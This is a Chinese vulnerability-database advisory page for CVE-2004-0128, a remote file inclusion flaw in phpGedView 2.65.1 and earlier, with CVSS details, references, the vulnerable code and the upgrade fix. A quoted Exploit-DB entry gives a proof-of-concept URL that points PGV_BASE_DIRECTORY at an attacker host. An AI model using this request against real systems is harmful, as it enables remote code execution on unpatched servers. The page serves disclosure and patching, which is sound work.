CVE-2004-0128
CVSS7.5
发布时间 :2004-03-03 00:00:00
修订时间 :2008-09-05 16:37:36
NMCOE    

[原文]PHP remote file inclusion vulnerability in the GEDCOM configuration script for phpGedView 2.65.1 and earlier allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains a malicious theme.php script.


[CNNVD]PhpGedView [GED_File]_conf.php远程文件包含漏洞(CNNVD-200403-043)

        
        phpGedView是一款开放源代码系统,可在线查看Gedcom信息。
        phpGedView [GED_File]_conf.php文件对用户提交的URI参数缺少充分过滤,远程攻击者可以利用这个漏洞包含远程服务器上文件,以WEB进程权限执行任意命令。
        问题存在于如下代码中:
        123:if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php")) require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");
        124:else {
        125: $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
        126: require($THEME_DIR."theme.php");
        127: }
        由于对PGV_BASE_DIRECTORY参数缺少充分处理,提交远程服务器上的恶意文件作为包含文件,就可以以WEB进程权限执行包含的代码。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:phpgedview:phpgedview:2.65.1
cpe:/a:phpgedview:phpgedview:2.61.1
cpe:/a:phpgedview:phpgedview:2.61
cpe:/a:phpgedview:phpgedview:2.52.3
cpe:/a:phpgedview:phpgedview:2.60
cpe:/a:phpgedview:phpgedview:2.65

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0128
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0128
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200403-043
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/9531
(VENDOR_ADVISORY)  BID  9531
http://www.securityfocus.com/archive/1/352355
(VENDOR_ADVISORY)  BUGTRAQ  20040129 PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior
http://xforce.iss.net/xforce/xfdb/14987
(UNKNOWN)  XF  phpgedview-gedfilconf-file-include(14987)
http://www.osvdb.org/3769
(UNKNOWN)  OSVDB  3769
http://sourceforge.net/project/shownotes.php?release_id=141517
(VENDOR_ADVISORY)  CONFIRM  http://sourceforge.net/project/shownotes.php?release_id=141517
http://secunia.com/advisories/10753/
(UNKNOWN)  SECUNIA  10753

- 漏洞信息

PhpGedView [GED_File]_conf.php远程文件包含漏洞
高危 未知
2004-03-03 00:00:00 2006-11-02 00:00:00
远程  
        
        phpGedView是一款开放源代码系统,可在线查看Gedcom信息。
        phpGedView [GED_File]_conf.php文件对用户提交的URI参数缺少充分过滤,远程攻击者可以利用这个漏洞包含远程服务器上文件,以WEB进程权限执行任意命令。
        问题存在于如下代码中:
        123:if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php")) require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");
        124:else {
        125: $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
        126: require($THEME_DIR."theme.php");
        127: }
        由于对PGV_BASE_DIRECTORY参数缺少充分处理,提交远程服务器上的恶意文件作为包含文件,就可以以WEB进程权限执行包含的代码。
        

- 公告与补丁

        厂商补丁:
        PhpGedView
        ----------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载phpGedView 2.65.2:
        
        http://phpgedview.sourceforge.net/

- 漏洞信息 (23617)

PhpGedView 2.x [GED_File]_conf.php Remote File Include Vulnerability (EDBID:23617)
php webapps
2004-01-30 Verified
0 Cedric Cochin
N/A [点击下载]
source: http://www.securityfocus.com/bid/9531/info

It has been reported that PhpGedView may be prone to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem reportedly exists because remote users may influence the 'PGV_BASE_DIRECTORY' variable in the [GED_File]_conf.php module, which specifies an include path.

PhpGedView versions 2.65.1 and prior have been reported to be prone to this issue.

http://www.example.com/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/		

- 漏洞信息

3769
PhpGedView PGV_BASE_DIRECTORY Arbitrary Command Execution
Remote / Network Access Authentication Management, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

PhpGedView contains a flaw that may allow a malicious user to execute arbitrary code. The issue is triggered because remote users may influence the 'PGV_BASE_DIRECTORY' variable in the [GED_File]_conf.php module, which specifies an include path. It is possible that the flaw may allow an attacker to execute arbitrary code resulting in a loss of confidentiality, integrity, and/or availability.

- 时间线

2004-01-29 2004-01-29
Unknow Unknow

- 解决方案

Upgrade to version 2.65.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站